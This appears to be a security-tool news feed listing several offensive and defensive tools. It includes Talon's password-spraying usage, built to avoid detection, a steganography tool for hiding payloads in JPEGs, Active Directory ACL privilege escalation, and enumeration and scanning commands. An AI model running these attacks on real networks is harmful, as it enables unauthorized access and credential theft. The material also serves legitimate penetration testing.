Talon is a tool designed to perform automated password guessing attacks while remaining undetected. Talon can enumerate a list of users to identify which users are valid, using Kerberos. Talon can also perform a password guessing attack against the Kerberos and LDAPS (LDAP Secure) services. Talon can either use a single domain controller or multiple ones to perform these attacks, randomizing each attempt, between the domain controllers and services (LDAP or Kerberos).


More info about the techniques can be found on the following Blog


Usage

Download release for your OS from releases


Contributing

Talon was developed in golang.

The first step as always is to clone the repo. Before you compile Talon you'll need to install the dependencies. To install them, run following commands:

go get github.com/fatih/color
go get gopkg.in/jcmturner/gokrb5.v7/client
go get gopkg.in/jcmturner/gokrb5.v7/config
go get gopkg.in/jcmturner/gokrb5.v7/iana/etypeID
go get gopkg.in/ldap.v2

Then build it

go build Talon.go

Usage
$ ./Talon -h
Usage of ./Talon:
-D string
Fully qualified domain to use
-E Enumerates which users are valid
-H string
Domain controller to connect to
-Hostfile string
File containing the list of domain controllers to connect to
-K Test against Kerberos only
-L Test against LDAP only
-O string
File to append the results to
-P string
Password to use
-U string
Username to authenticate as
-Userfile string
File containing the list of usernames
-debug
Print debug statements
-sleep float
Time inbetween attempts (default 0.5)

Enumeration Mode

User enumeration mode can be executed with the -E flag which will send only Kerberos TGT pre-authentication request to the target KDC, however, this request is sent with a known bad or no longer supported encryption type. Talon reviews the response by the KDC to determine if responds with a KDC_ERR_ETYPE_NOSUPP, which indicates if a user exists or KDC_ERR_C_PRINCIPAL_UNKNOWN if it does not. Talon can perform this type of enumeration against multiple domain controllers in an enterprise using the -Hostfile command to specify multiple domain controllers, or a single domain controller using -H. Using this technique will not cause any login failures so it will not lock out any of the users.

./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile Users -sleep 1 -E 

__________ ________ ___ ________ ________
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
(@Tyl0us)


[-] 172.16.144.195 STARLABS.LOCAL\asmith: = User Does Not Exist
[+] 172.16.144.185 STARLABS.LOCAL\ballen: = User Exist
[-] 172.16.144.186 STARLABS.LOCAL\bjohnson: = User Does Not Exist
[-] 172.16.144.195 STARLABS.LOCAL\bwayne: = User Does Not Exist
[+] 172.16.144.195 STARLABS.LOCAL\csnow: = User Exist
[-] 172.16.144.186 STARLABS.LOCAL\jtodd: = User Does Not Exist
[+] 172.16.144.186 STARLABS.LOCAL\hwells: = User Exist
[-] 172.16.144.186 STARLABS.LOCAL\wwest: = User's Account Locked

Automated Password Guessing Mode

Talon utilize Kerberos and LDAP, which are both integrated into Active Directory for authentication. Talon can perform password guessing by alternating between the two services, allowing the password attack traffic to be split across two protocols. This splits the number of potential events generated, as a result reducing the chance of an alert. Talon takes this one step further, by distributing a password attack against multiple domain controllers in an enterprise using the -Hostfile, alternating between LDAP and Kerberos each time to create an additional layer of obscurity. A single domain controller can be provided using in the -H command if needed.

./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile ValidUsers -P "Not3vil" -sleep 1

__________ ________ ___ ________ ________
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
(@Tyl0us)


[-] 172.16.144.186 STARLABS.LOCAL\admin:Not3vil = Failed
[-] 172.16.144.185 STARLABS.LOCAL\ballen:Not3vil = Failed
[-] 172.16.144.195 STARLABS.LOCAL\cramon:Not3vil = Failed
[+] 172.16.144.185 STARLABS.LOCAL\hwells:Not3vil = Success
[-] 172.16.144.195 STARLABS.LOCAL\ssmith:Not3vil = Failed

Talon is designed to be versitale given any siutaiton as a result, if only Kerberose is available, Talon can be set to only attack against Kerberos using the -K flag or only LDAP using the -L flag.

Talon can use both Kerberos and LDAP to read the responses as we perform a password guessing attack. Talon can detect account lockouts during an active password guessing attack by reading the response code from each password attempt. This can help prevent any unwanted account locks acorss a enterprise, helping you to remain undetected. Simply follow the prompt to quit or continue the attack.

root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2

__________ ________ ___ ________ ________
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
(@Tyl0us)


[-] 172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed
[-] 172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed
[-] 172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked
[*] Account lock out detected - Do you want to continue.[y/n]:

Troubleshooting

Talon comes equip to detect if the targeted domain controllers are activy or become unavialble. This helps ensure your getting accurate results while not wasting time.

root@kali:~# ./Talon -H 172.14.15.1 -Userfile ValidUsers -D STARLABS.local -P "Frosty20" -sleep 2

__________ ________ ___ ________ ________
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
(@Tyl0us)


[Root cause: Networking_Error] Networking_Error: AS Exchange Error: failed sending AS_REQ to KDC: failed to communicate with KDC 172.14.15.1
[*] Do you want to continue.[y/n]:

Changelog
  • Published on 04/09/2018
  • Version 1.2 released 02/14/2019
  • Version 1.3 released 05/03/2019
  • Version 1.4 released 03/17/2020
  • Version 2.0 public relase 06/18/2020


Admin-Scanner - This Tool Is Design To Find Admin Panel Of Any Website By Using Custom Wordlist Or Default Wordlist Easily

$
0
0


Website Admin Panel Finder

How To Install (Linux/pc)

How to Install (Termux/Android)

Usage
author: alienwhatever
credit github.com/bdblackhat for list.txt
orginal-source-of-list.txt - https://github.com/bdblackhat/admin-panel-finder/blob/master/link.txt

This tool is for educational and testing purposes only
I am not responsible for what you do with this tool

Usages:

-site <url of website> - Website to scan

--proxy <prorocol>-<proxyserverip:port> - Scan admin panel using proxy server

--t <second(s)> - Time delay for a thread to scan (To prevent from getting HTTP 508)

--w <path/of/custom/wordlist> - custom wordlist

Example:
./scan.py -site example.com
./scan.py -site example.com --t 1
./scan.py -site example.com example2.com
./scan.py -site example.com --w /custom/wordlist/list.txt
./scan.py --proxy http-1.2.3.4:8080 -site example.com



Fortiscan - A High Performance FortiGate SSL-VPN Vulnerability Scanning And Exploitation Tool

GG-AESY - Hide Cool Stuff In Images

$
0
0


Blogpost: https://redteamer.tips/introducing-gg-aesy-a-stegocryptor/

WARNING: you might need to restore NuGet packages and restart visual studio before compiling. If anyone knows how I can get rid of this problem, DM me.


Manual

To start off, I highly recommend to always use GG-AESY using verbose mode or very verbose mode, if you are not using this in unmanaged loaders, I also recommend always specifying an outfile.

pay attention with very verbose mode though, especially if you are hiding big payloads. as very verbose mode will print the byte array to console.

having said that, let's dive into the manual for this baby.

  _______   _______                    ___       _______     _______.____    ____
/ _____| / _____| / \ | ____| / |\ \ / /
| | __ | | __ ______ / ^ \ | |__ | (----` \ \/ /
| | |_ | | | |_ | |______| / /_\ \ | __| \ \ \_ _/
| |__| | | |__| | / _____ \ | |____.----) | | |
\______| \______| /__/ \__\ |_______|_______/ |__|


V1.0.0 by twitter.com/Jean_Maes_1994

Encryptor and (optional) stegano

Usage:
-h, -?, --help Show Help


-e, --encrypt-only Only encrypts given payload

-d, --decrypt decryption mode

--ps, --payload-size=VALUE
only needed if extracting pay load from image for
decryption

--ef, --encrypted-file=VALUE
ENCRYPTION: The outfile for encrypted data

DECRYPTION:The inputfile needed to decrypt the
payload.




-p, --payload=VALUE The path to the payload you want to encrypt

-o, --outfile=VALUE The path to the outfile where all important data
will be written to (key,iv and encrypted
payload)

-i, --image=VALUE The image file to hide the key and/or IV in,
currently only supports JPEG (JPG) format!

--ok, --offset-key=VALUE
The offset to search for the key in image (in
decimal)

--okh, --offset-key-hex=VALUE
The offset to search for the key in image (in
hex)

--oIV, --offset-IV=VALUE
The offset to search for the IV in image (in
decimal)

--oIVh, --offset-IV-hex=VALUE
The offset to search for the IV in image (in
hex)

--op, --offset-payload=VALUE
The offset to search for the payload in image
(in decimal)

--oph, --offset-payload-hex=VALUE
The offset to search for the payload in image
(in hex)

-v, --verbose write all the good stuff to console,recommended
you actually always use this.

--vv, --very-verbose prints encrypted payload array to console
-k, --key=VALUE in case you want to use your own key value!

--IV, --initialization-vector=VALUE
in case you want to use your own IV

--rk, --random-key-mode
will hide your key in a random insertion point
in the provided image, without breaking said
image. will print the offset to console

--ra, --random-all-mode
will hide both Key and IV in a random insertion
point of the image.

--ak, --append-key-mode
will hide the key at the end of the image file

--aa, --append-all-mode
will hide the key and the IV at the end of the
image file.

--ap, --append-payload-mode
will hide the payload at the end of the image
file

--rp, --random-payload-mode
will hide the payload at a random insertion
point.

--apu, --append-payload-unencrypted
appends your payload without crypto, useful for
very quick and dirty data exfil.

-e or --encrypt-only: Will only encrypt a given payload (-p) will write key/iv to console if using verbose mode, will write key/iv/payload into an outfile if using the outfile (-o) flag, and finally will write the bytestream to another file if using the encrypted file (-ef) flag.

-d or --decrypt: Decryption mode, you can specify the decryption parameters using offsets (in case you have hidden key or key and IV in a JPEG). Offsets are passed to the program using either the offset-key (-ok) or offset-key-hex (-okh) flags, you can use "-" as separators or just paste in the hex without any separators, both will work fine. IV's work the same way using -oIV and -oIVh flags.

Alternatively, you can give the IV and Key directly (in case they are not hidden in a JPEG), using the key (-k) and initialization-vectors (-IV) flags. As with the offset flags, "-" can be used as a separator, GG-AESY accepts both ASCII and byte values.

In order to decrypt, you'll also need to specify an encrypted file (-ef).
Should you have hidden a payload in a JPEG and wish to decrypt it, you'll have to specify the payload size (-ps) so GG-AESY will extract all data correctly without false positives/false negatives :) .

-u or --unpack: Will unpack unencrypted appended payloads (=apu mode) from the JPEG.


Stego modes:

If no key/iv is provided, random key/iv's will be used to encrypt your data. All stego modes will require you to pass GG-AESY a JPEG image (-i). If you have specified an outfile (-o) to save your important information about the crypto ( such as key, iv, payload), all stego modes will also add the injection places in this file.

-rk or --random-key-mode: This Stego mode will hide your AES-256 key at a random injection point.

-ra or --random-all-mode: This Stego mode will hide both your AES-256 key and IV at a random injection point, both injection points can be the same (it's a random selection process), in this case, the key and IV will be injected back to back.

-ak or --append-key-mode: This Stego mode will append the AES-256 key at the end of the JPEG.

-aa or --append-all-mode: This Stego mode will append both AES-256 key and IV at the end of the JPEG.

-ap or --append-payload-mode: This Stego mode will append the encrypted payload bytestream to the end of the JPEG.

-rp or --random-payload-mode: This Stego mode will inject the encrypted payload bytestream at a random injection point. CAUTION: This only works if your payload does not exceed 65,535 bytes, which is about 65kb, if you try a larger payload, an error will be thrown in your face. Needless to say, this mode is practically useless :)

-apu or --append-payload-unencrypted: This Stego mode will append the payload bytestream as-is to the end of the JPEG.

DISCLAIMER: This tool is in EARLY BETA. It's not been battle tested yet, so please submit improvements through PR's or raise issues in case of bugs. However, due to my current workload, active development on this tool from my end will not be possible at this time.
This does not mean I'm abandoning this project though :)



OnionSearch - A Script That Scrapes Urls On Different .Onion Search Engines

$
0
0


OnionSearch is a Python3 script that scrapes urls on different ".onion" search engines.


Prerequisite

Python 3


Currently supported Search engines

  • ahmia
  • darksearchio
  • onionland
  • notevil
  • darksearchenginer
  • phobos
  • onionsearchserver
  • torgle
  • onionsearchengine
  • tordex
  • tor66
  • tormax
  • haystack
  • multivac
  • evosearch
  • deeplink

️
Installation


With PyPI

pip3 install onionsearch


With Github
git clone https://github.com/megadose/OnionSearch.git
cd OnionSearch/
python3 setup.py install

Usage

Help:

usage: onionsearch [-h] [--proxy PROXY] [--output OUTPUT]
[--continuous_write CONTINUOUS_WRITE] [--limit LIMIT]
[--engines [ENGINES [ENGINES ...]]]
[--exclude [EXCLUDE [EXCLUDE ...]]]
[--fields [FIELDS [FIELDS ...]]]
[--field_delimiter FIELD_DELIMITER] [--mp_units MP_UNITS]
search

positional arguments:
search The search string or phrase

optional arguments:
-h, --help show this help message and exit
--proxy PROXY Set Tor proxy (default: 127.0.0.1:9050)
--output OUTPUT Output File (default: output_$SEARCH_$DATE.txt), where $SEARCH is replaced by the first chars of the search string and $DATE is replaced by the datetime
--continuous_write CONTINUOUS_WRITE
Write progressively to output file (default: False)
--limit LIMIT Set a max number of pages per engine to load
--engines [ENGINES [ENGINES ...]]
Engines to request (default: full list)
--exclude [EXCLUDE [EXCLUDE ...]]
Engines to exclude (default: none)
--fields [FIELDS [FIELDS ...]]
Fields to output to csv file (default: engine name link), available fields are shown below
--field_delimiter FIELD_DELIMITER
Delimiter for the CSV fields
--mp_units MP_UNITS Number of processing units (default: core number minus 1)

[...]

Multi-processing behaviour

By default, the script will run with the parameter mp_units = cpu_count() - 1. It means if you have a machine with 4 cores, it will run 3 scraping functions in parallel. You can force mp_units to any value but it is recommended to leave to default. You may want to set it to 1 to run all requests sequentially (disabling multi-processing feature).

Please note that continuous writing to csv file has not been heavily tested with multiprocessing feature and therefore may not work as expected.

Please also note that the progress bars may not be properly displayed when mp_units is greater than 1. It does not affect the results, so don't worry.


Examples

To request all the engines for the word "computer":

onionsearch "computer"

To request all the engines excepted "Ahmia" and "Candle" for the word "computer":

onionsearch "computer" --exclude ahmia candle

To request only "Tor66", "DeepLink" and "Phobos" for the word "computer":

onionsearch "computer" --engines tor66 deeplink phobos

The same as previously but limiting to 3 the number of pages to load per engine:

onionsearch "computer" --engines tor66 deeplink phobos --limit 3

Please kindly note that the list of supported engines (and their keys) is given in the script help (-h).


Output

Default output

By default, the file is written at the end of the process. The file will be csv formatted, containing the following columns:

"engine","name of the link","url"

Customizing the output fields

You can customize what will be flush in the output file by using the parameters --fields and --field_delimiter.

--fields allows you to add, remove, re-order the output fields. The default mode is show just below. Instead, you can for instance choose to output:

"engine","name of the link","url","domain"

by setting --fields engine name link domain.

Or even, you can choose to output:

"engine","domain"

by setting --fields engine domain.

These are examples but there are many possibilities.

Finally, you can also choose to modify the CSV delimiter (comma by default), for instance: --field_delimiter ";".


Changing filename

The filename will be set by default to output_$DATE_$SEARCH.txt, where $DATE represents the current datetime and $SEARCH the first characters of the search string.

You can modify this filename by using --output when running the script, for instance:

onionsearch "computer" --output "\$DATE.csv"
onionsearch "computer" --output output.txt
onionsearch "computer" --output "\$DATE_\$SEARCH.csv"
...

(Note that it might be necessary to escape the dollar character.)

In the csv file produced, the name and url strings are sanitized as much as possible, but there might still be some problems...


Write progressively

You can choose to progressively write to the output (instead of everything at the end, which would prevent losing the results if something goes wrong). To do so you have to use --continuous_write True, just as is:

onionsearch "computer" --continuous_write True

You can then use the tail -f (tail follow) Unix command to actively watch or monitor the results of the scraping.


Thank you to Gobarigo


Terrascan - Detect Compliance And Security Violations Across Infrastructure As Code To Mitigate Risk Before Provisioning Cloud Native Infrastructure

$
0
0


Detect compliance and security violations across Infrastructure as Code to mitigate risk before provisioningcloud native infrastructure.


Features
  • 500+ Policies for security best practices
  • Scanning of Terraform 12+ (HCL2)
  • Scanning of Kubernetes (JSON/YAML), Helm v3, and Kustomize v3
  • Support for AWS, Azure, GCP, Kubernetes and GitHub

Installing

Terrascan's binary for your architecture can be found on the releases page. Here's an example of how to install it:

$ curl --location https://github.com/accurics/terrascan/releases/download/v1.2.0/terrascan_1.2.0_Darwin_x86_64.tar.gz --output terrascan.tar.gz
$ tar -xvf terrascan.tar.gz
x CHANGELOG.md
x LICENSE
x README.md
x terrascan
$ install terrascan /usr/local/bin
$ terrascan

If you have go installed, Terrascan can be installed with go get

$ export GO111MODULE=on
$ go get -u github.com/accurics/terrascan/cmd/terrascan
go: downloading github.com/accurics/terrascan v1.2.0
go: found github.com/accurics/terrascan/cmd/terrascan in github.com/accurics/terrascan v1.2.0
...
$ terrascan

Install via brew

Homebrew users can install by:

$ brew install terrascan

Docker

Terrascan is also available as a Docker image and can be used as follows

$ docker run accurics/terrascan

Building Terrascan

Terrascan can be built locally. This is helpful if you want to be on the latest version or when developing Terrascan.

$ git clone git@github.com:accurics/terrascan.git
$ cd terrascan
$ make build
$ ./bin/terrascan

Getting started

To scan your code for security issues you can run the following (defaults to scanning Terraform).

$ terrascan scan

Terrascan will exit 3 if any issues are found.

The following commands are available:

$ terrascan
Terrascan

An advanced IaC (Infrastructure-as-Code) file scanner written in Go.
Secure your cloud deployments at design time.
For more information, please visit https://www.accurics.com

Usage:
terrascan [command]

Available Commands:
help Help about any command
init Initialize Terrascan
scan Scan IaC (Infrastructure-as-Code) files for vulnerabilities.
server Run Terrascan as an API server

Flags:
-c, --config-path string config file path
-h, --help help for terrascan
-l, --log-level string log level (debug, info, warn, error, panic, fatal) (default "info")
-x, --log-type string log output type (console, json) (default "console")
-o, --output-type string output type (json, yaml, xml) (default "yaml")
-v, --version version for terrascan

Use "terrascan [command] --help" for more information about a command.

Documentation

To learn more about Terrascan check out the documentation https://docs.accurics.com where we include a getting started guide, Terrascan's architecture, a breakdown of it's commands, and a deep dive into policies.


Developing Terrascan

To learn more about developing and contributing to Terrascan refer to the contributing guide.



Hacktory platform packed with new game-playing features

$
0
0

Without practice, theory is dead. Applied knowledge is essential in any area, especially in cybersecurity, and practice is the only way to make learning worthwhile.

There are so many courses to fit any demand. However, boring lectures, outdated textbooks, and vague, complex tasks become obstacles even for the most ambitious student.

Motivation is what pushes us towards a goal, and that's where gamification comes in. Gamification is a training methodology that helps to solve real issues and apply your knowledge immediately in practice, learn new skills, build independence, and motivate students. This tool allows the use of playful techniques in non-entertainment environments such as education or work.

One learning context for all

Cybersecurity professionals often have to think on their feet in stressful situations. Gamification, applied to immersive simulated training, has several benefits for skill development in cybersecurity. It helps employees learn to solve real-life problems while keeping them engaged, focused, and motivated. It also creates a more effective workplace. With improved interaction between co-workers, mundane tasks suddenly become competitive, which boosts overall performance. Ultimately, gamification makes employees feel happier in their roles, reduces churn, and improves productivity. 

A gamified learning process helps students understand complex topics and apply new knowledge immediately to write good-working code, find vulnerabilities, and fix them. What is equally important, the students can see their mistakes and correct them in real time. The opportunity to break into the top, solve practice assignments faster than others and set new records is an important component of the learning process, which keeps people motivated and hungry for more information and skills.

Game-based platform

Hacktory is a gamified platform for cybersecurity training that emulates real cases to teach ethical hacking techniques.

Hacktory grows and continues to evolve. Red and Blue teams did their best for prospective users and created courses in Web Security and Java Secure Programming. Premium access to the platform includes both of these courses, so your opportunities double. You can take two exams and get two certificates. 

The team has developed and improved not only the content but also the functionality to make the immersion in the cyber world more realistic.

The personal page is your claim to fame 


All necessary information concerning user activity is summarized in one place, including a list of active courses, success rates, and the number of points earned. 
  • Track your position on the leaderboard right here. Scores are a quantitative indicator of your success. Make progress, earn more points, and get to the top!
  • Collect hackcoins and exchange them for different items, including hints. The page displays the number of earned coins and hints.
  • There's always room for art. The platform creates individual skill graphs for your courses based on the received awards and completed practice assignments. What's your choice – attack or defense? Look at your strengths in cybersecurity and the skills you need to boost. 
  • Monitor your course progress and make plans for the next week or month.
The personal page is your identity. Share your achievements with friends on social media!

How good are you at cybersecurity?

A page with the results of practice assignments is available to all users.


Once an assignment is submitted, you can look at your results and estimate the time and effort it took to solve the problem. You can instantly see the stats: spent time, hints used, and earned hackcoins. The platform compares your results with those of other users, motivating you to stay ahead. 

Referral program

The most recent update introduces the referral program. 


Now, every user has a unique link that they can easily share with others wishing to join Hacktory. The platform will generously reward users with hackcoins, which can buy premium access.

Learning should be available to everyone, so access to courses is simplified and has no time limits for free access. It remains with you forever.

Hacktory is committed to sharing cybersecurity knowledge and experience and is open to partnering with organizations and universities. Hacktory's cybersecurity experts deliver regular webinars and workshops in Java and web application security, focusing on practical tasks. Stay tuned and follow us on Twitter, Facebook, or LinkedIn, and do not miss bug bounty tips, valuable materials, free webinars, and enjoyable contests.







Fast-Security-Scanners - Security Checks For Your Researches

$
0
0


A small contribution to community :)

We use all these tools in security assessments and in our vulnerability monitoring service


Check your domain for DNS NS takeover (Repo)

docker run --dns=8.8.8.8 -e VULN_ID=dns_ns_takeover -e DOMAIN=site.com whitespots/dnsnstakeover


Cache Poisoning (Repo)

docker run --rm -it --name wcdscanner -e VULN_ID=wcd -e FIND_XSS=False -e DOMAIN=site.com whitespots/wcdxss


XSS via Meta tags (exploitable with cache poisoning) (Repo)

docker run --rm -it --name wcdscanner -e VULN_ID=xss_meta -e FIND_XSS=True -e DOMAIN=site.com whitespots/wcdxss


CORS misconfiguration on pages from Webarchives (Repo)

docker run --rm -it --name corsfinder -e VULN_ID=cors -e DOMAIN=site.com whitespots/corsfinder


CRLF vulnerabilities via url path and headers (Repo)

docker run --rm -it --name crlf-finder -e VULN_ID=crlf -e DOMAIN=site.com whitespots/crlf-finder


Path Traversal via url path (Repo)

docker run --rm -it --name ptrav-finder -e VULN_ID=ptrav -e DOMAIN=site.com whitespots/ptrav-finder


Check your 403 for bypasses (Repo)

docker run --rm --name forbid-bypasser -e VULN_ID=forbid_bypassed -e DOMAIN=site.com whitespots/forbid-bypasser


Find admin panels (Repo)

docker run --rm -it --name adminfinder -e VULN_ID=adminfinder -e DOMAIN=site.com whitespots/adminfinder


Check your site for social networks "accounts takeover" via broken social network links (Repo)

docker run --rm -it --name scanner -e VULN_ID=broken_social -e DOMAIN=site.com whitespots/brokensocial



JSFScan.sh - Automation For Javascript Recon In Bug Bounty

$
0
0


Blog can be found at https://medium.com/@patelkathan22/beginners-guide-on-how-you-can-use-javascript-in-bugbounty-492f6eb1f9ea?sk=21500dc4288281c7e6ed2315943269e7

Script made for all your javascript recon automation in bugbounty. Just pass subdomain list to it and options according to your preference.


Features
1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.

Installation

There are two ways of executing this script: Either locally on the host machine or within a Docker container


Installing all dependencies locally

Note: Make sure you have installed golang properly before running installation script locally.

$ sudo chmod +x install.sh
$ ./install.sh

Building the docker container

When using the docker version, everything will be installed automatically. You just have to execute the following commands:

$ git clone https://github.com/KathanP19/JSFScan.sh
$ cd JSFScan/
$ docker build . -t jsfscan

In order to start the pre-configured container run the following command:

$ docker run -it jsfscan "/bin/bash"

After that an interactive bash session should be opened.


Usage

Target List should be with https:// and http:// use httpx or httprobe for this.

https://hackerone.com
https://github.com

And if you want to add cookie then edit the command at line 23 cat $target | hakrawler -js -cookie "cookie here" -depth 2 -scope subs -plain >> jsfile_links.txt

NOTE: If you feel tool is slow just comment out hakrawler line at 23 in JSFScan.sh script , but it might result in little less jsfileslinks.

 _______ ______ _______ ______                          _     
(_______/ _____(_______/ _____) | |
_ ( (____ _____ ( (____ ____ _____ ____ ___| |__
_ | | \____ \| ___) \____ \ / ___(____ | _ \ /___| _ \
| |_| | _____) | | _____) ( (___/ ___ | | | |_|___ | | | |
\___/ (______/|_| (______/ \____\_____|_| |_(_(___/|_| |_|

Usage:
-l Gather Js Files Links
-f Import File Containing JS Urls
-e Gather Endpoints For JSFiles
-s Find Secrets For JSFiles
-m Fetch Js Files for manual testing
-o Make an Output Directory to put all things Together
-w Make a wordlist using words from jsfiles
-v Extract Vairables from the jsfiles
-d Scan for Possible DomXSS from jsfiles



Aclpwn.Py - Active Directory ACL Exploitation With BloodHound

$
0
0


Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn, which you can read about in our blog.


Dependencies and installation

Aclpwn.py is compatible with both Python 2.7 and 3.5+. It requires the neo4j-driver, impacket and ldap3 libraries. You can install aclpwn.py via pip: pip install aclpwn. For Python 3, you will need the python36branch of impacket since the master branch (and versions published on PyPI) are Python 2 only at this point.


Usage

For usage and documentation, see the wiki, for example the quickstart page.


Features

aclpwn.py currently has the following features:

  • Direct integration with BloodHound and the Neo4j graph database (fast pathfinding)
  • Supports any reversible ACL based attack chain (no support for resetting user passwords right now)
  • Advanced pathfinding (Dijkstra) to find the most efficient paths
  • Support for exploitation with NTLM hashes (pass-the-hash)
  • Saves restore state, easy rollback of changes
  • Can be run via a SOCKS tunnel
  • Written in Python (2.7 and 3.5+), so OS independent

Mitigations and detection

aclpwn.py does not exploit any vulnerabilities, but relies on misconfigured (often because of delegated privileges) or insecure default ACLs. To solve these issues, it is important to identify potentially dangerous ACLs in your Active Directory environment with BloodHound. For detection, Windows Event Logs can be used. The relevant event IDs are described in our blog



Enum4Linux-Ng - A Next Generation Version Of Enum4Linux (A Windows/Samba Enumeration Tool) With Additional Features Like JSON/YAML Export

$
0
0


enum4linux-ng.py is a rewrite of Mark Lowe's (former Portcullis Labs now Cisco CX Security Labs) enum4linux.pl, a tool for enumerating information from Windows and Samba systems, aimed for security professionals and CTF players. The tool is mainly a wrapper around the Samba tools nmblookup, net, rpcclient and smbclient.


I made it for educational purposes for myself and to overcome issues with enum4linux.pl. It has the same functionality as the original tool (though it does some things differently). Other than the original tool it parses all output of the Samba tools and allows to export all findings as YAML or JSON file. The idea behind this is to allow other tools to import the findings and further process them. It is planned to add new features in the future.


Features
  • support for YAML and JSON output
  • colored console output (can be disabled via NO_COLOR)
  • ldapsearch und polenum are natively implemented
  • support for legacy SMBv1 connections
  • auto detection of IPC signing support
  • 'smart' enumeration will automatically disable tests which would otherwise fail
  • timeout support
  • IPv6 support (experimental)

Differences

Some things are implemented differently compared to the original enum4linux. These are the important differences:

  • RID cycling is not part of the default enumeration (-A) but can be enabled with -R
  • parameter naming is slightly different (e.g. -A instead of -a)

Credits

I'd like to thank and give credit to the people at former Portcullis Labs (now Cisco CX Security Labs), namely:

In addition, I'd like to thank and give credit to:

It was lots of fun reading your code! :)


Legal note

If you use the tool: Don't use it for illegal purposes.


Run
  1. Install dependencies (various options)
  2. $ git clone https://github.com/cddmp/enum4linux-ng && cd enum4linux-ng
  3. Run, e.g. $ ./enum4linux-ng.py -As <target> -oY out

If you prefer a Docker based installation, an example run can be found below.


Demo

This demonstrates a run against Windows Server 2012 R2 standard installation. The following command is being used:

enum4linux-ng.py 192.168.125.131 -u Tester -p 'Start123!' -oY out

A user 'Tester' with password 'Start123!' was created. Firewall access was allowed. Once the enumeration is finished, I scroll up so that the results become more clear. Since no other enumeration option is specified, the tool will assume -A which behaves similar to enum4linux -a option. User and password are passed in. The -oY option will export all enumerated data as YAML file for further processing in out.yaml. The tool automatically detects at the beginning that LDAP is not running on the remote host. It will therefore skip any further LDAP checks which would normally be part of the default enumeration.



The second demo shows a run against Metasploitable2. The following command is being used:

enum4linux-ng.py 192.168.125.145 -A -C

This time the -A and -C option are used. While the first one behaves similar to enum4linux -a option, the second one will enable enumeration of services. This time no credentials were provided. The tool automatically detects that it needs to use SMBv1. No YAML or JSON file is being written. Again I scroll up so that the results become more clear.



Usage
ENUM4LINUX - next generation

usage: enum4linux-ng.py [-h] [-A] [-As] [-U] [-G] [-Gm] [-S] [-C] [-P] [-O] [-L] [-I] [-R] [-N] [-w WORKGROUP] [-u USER] [-p PW] [-d] [-k USERS] [-r RANGES] [-s SHARES_FILE] [-t TIMEOUT]
[-v] [-oJ OUT_JSON_FILE | -oY OUT_YAML_FILE | -oA OUT_FILE]
host

This tool is a rewrite of Mark Lowe's enum4linux.pl, a tool for enumerating information from Windows and Samba systems. It is mainly a wrapper around the Samba tools nmblookup, net,
rpcclient and smbclient. Other than the original tool it allows to export enumeration results as YAML or JSON file, so that it can be further processed with other tools. The tool tries to
do a 'smart' enumeration. It first checks whether SMB or LDAP is accessible on the target. Depending on the result of this check, it will dynamically skip checks (e.g. LDAP checks if LDAP
is not running). If SMB is accessible, it will always check wh ether a session can be set up or not. If no session can be set up, the tool will stop enumeration. The enumeration process can
be interupted with CTRL+C. If the options -oJ or -oY are provided, the tool will write out the current enumeration state to the JSON or YAML file, once it receives SIGINT triggered by
CTRL+C. The tool was made for security professionals and CTF players. Illegal use is prohibited.

positional arguments:
host

optional arguments:
-h, --help show this help message and exit
-A Do all simple enumeration including nmblookup (-U -G -S -P -O -N -I -L). This option is enabled if you don't provide any other option.
-As Do all simple short enumeration without NetBIOS names lookup (-U -G -S -P -O -I -L)
-U Get users via RPC
-G Get groups via RPC
-Gm Get groups with group members via RPC
-S Get share s via RPC
-C Get services via RPC
-P Get password policy information via RPC
-O Get OS information via RPC
-L Get additional domain info via LDAP/LDAPS (for DCs only)
-I Get printer information via RPC
-R Enumerate users via RID cycling
-N Do an NetBIOS names lookup (similar to nbstat) and try to retrieve workgroup from output
-w WORKGROUP Specify workgroup/domain manually (usually found automatically)
-u USER Specify username to use (default "")
-p PW Specify password to use (default "")
-d Get detailed information for users and groups, applies to -U, -G and -R
